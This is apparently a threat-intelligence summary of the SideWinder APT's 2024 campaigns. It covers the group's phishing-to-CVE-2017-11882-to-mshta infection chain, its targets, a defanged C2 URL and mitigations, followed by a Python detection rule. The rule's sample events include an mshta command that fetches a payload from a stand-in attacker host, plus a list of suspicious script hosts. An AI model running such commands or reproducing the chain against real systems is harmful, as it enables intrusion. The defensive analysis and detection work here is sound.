Full Report
In this article, we discuss the tools and TTPs used in the SideWinder APT's attacks in H2 2024, as well as shifts in its targets, such as an increase in attacks against the maritime and logistics sectors.
# Analysis Summary
# Threat Actor: SideWinder
## Attribution & Identity
Highly prolific Advanced Persistent Threat (APT) group. Primarily associated with targeting military and government entities in Pakistan, Sri Lanka, China, and Nepal. Continues to actively update its toolset and infrastructure.
## Activity Summary
SideWinder demonstrated intense activity in the second half of 2024, updating its toolset and building out a large infrastructure. The group continued targeting government entities but showed a **significant strategic increase** in attacks against **maritime infrastructures and logistics companies**. The group closely monitors security detections and, once its tools are detected, rapidly issues updated versions (often in under five hours). In late 2024, observed activity included a significant number of attacks in Djibouti, followed by a focus on entities in Asia, with a strong interest in targets within Egypt, and further expansion into new African countries. A specific interest in nuclear power plants and nuclear energy in South Asia was also noted.
## Tactics, Techniques & Procedures
- **Infection Vector:** Spear-phishing emails containing malicious DOCX files.
- **Remote Template Injection:** The DOCX file utilizes remote template injection to download an RTF file from an attacker-controlled server.
- **Exploitation:** Exploits a known vulnerability in the RTF file (**CVE-2017-11882**) to run malicious shellcode.
- **Shellcode Execution:** Contains updated shellcode that uses anti-analysis techniques (checking RAM size via `GlobalMemoryStatusEx`, and attempting to load `nlssorting.dll` and terminating if the load succeeds). The shellcode invokes `mshtml.RunHTMLApplication`.
- **Loader Execution:** Executes the Windows utility `mshta.exe` to download an additional payload (a malicious HTA file) from a remote server.
- **Persistence/Evasion:** Constantly monitors security detections, quickly generates new malware versions, and changes persistence techniques and file paths/names upon detection.
## Targeting
- Sectors: Maritime infrastructures, logistics companies, government entities (national ministries, diplomatic entities), nuclear energy/power plants.
- Geography: South and Southeast Asia, the Middle East, Africa (including Djibouti and Egypt).
- Victims: Government entities, logistics companies, maritime infrastructures, nuclear energy agencies.
## Tools & Infrastructure
- Malware Families:
  - **Backdoor Loader:** A malware component installed via the initial infection chain.
  - **StealerBot:** A private post-exploitation toolkit used exclusively by SideWinder.
- Infrastructure:
  - C2/download servers using domains such as `dgtk.depo-govpk[.]com`; the full download URL observed was `hxxps://dgtk.depo-govpk[.]com/19263687/trui`.
## Implications
SideWinder represents a sophisticated, high-velocity threat actor capable of rapid adaptation. Its concentrated focus on the maritime and nuclear sectors suggests state-sponsored espionage, or the capability to disrupt critical infrastructure, in key global trade and energy regions. Its speed in updating tools after detection makes sustained detection coverage difficult to maintain.
## Mitigations
- Implement rigorous email filtering and sandbox analysis for all incoming documents, especially DOCX and RTF formats.
- Apply patches for CVE-2017-11882 immediately, as it remains a primary initial access vector.
- Monitor for the use of legitimate Windows utilities like `mshta.exe` to download remote content, especially in connection with Office document processing.
- Enhance monitoring for suspicious processes spawning from document handlers, looking for obfuscated JavaScript or shellcode execution signatures.
- Establish high-fidelity behavioral detections for the malware loading stages ("Backdoor Loader" and "StealerBot" behavior).
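The `mshta.exe` and document-handler mitigations above, and the infection chain in the TTP section, can be turned into a simple process-creation rule. The following is an added example, not code from the report: it evaluates constructed Sysmon-style process-creation events and flags a document handler spawning a script host, or `mshta.exe` launched with a remote URL. The inclusion of `EQNEDT32.EXE` (the Equation Editor process that CVE-2017-11882 targets) and the `example.invalid` URL are assumptions not taken from the page.

```python
import os
import re

# Processes that handle Office documents. EQNEDT32.EXE is the Equation Editor
# exploited by CVE-2017-11882; it is assumed here, not listed in the report.
DOCUMENT_HANDLERS = {"winword.exe", "excel.exe", "powerpnt.exe", "eqnedt32.exe"}
# Script/LOLBin hosts whose appearance under a document handler is suspicious.
SUSPICIOUS_CHILDREN = {"mshta.exe", "cmd.exe", "powershell.exe",
                       "wscript.exe", "cscript.exe", "rundll32.exe"}
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)

# Constructed sample events (Sysmon Event ID 1 fields); not from the report.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe https://c2.example.invalid/payload.hta"},
    {"ParentImage": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe C:\Users\alice\AppData\Local\Temp\setup.hta"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},
]

def _basename(path):
    """Lower-cased file name from a Windows path (works on any host OS)."""
    return os.path.basename(path.replace("\\", "/")).lower()

def evaluate(event):
    """Return a list of (severity, reason) findings for one process-creation event."""
    parent = _basename(event["ParentImage"])
    child = _basename(event["Image"])
    cmdline = event.get("CommandLine", "")
    findings = []
    if parent in DOCUMENT_HANDLERS and child in SUSPICIOUS_CHILDREN:
        findings.append(("high", f"{parent} spawned {child}"))
    if child == "mshta.exe" and REMOTE_URL.search(cmdline):
        findings.append(("medium", "mshta.exe invoked with a remote URL"))
    return findings

def scan(events):
    """Run evaluate() over a list of events; returns [(index, severity, reason), ...]."""
    return [(i, sev, why) for i, ev in enumerate(events) for sev, why in evaluate(ev)]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

A local `.hta` launched from `explorer.exe` (event 2) produces no finding, which keeps the rule focused on the Office-to-`mshta.exe` chain and remote downloads described in the report.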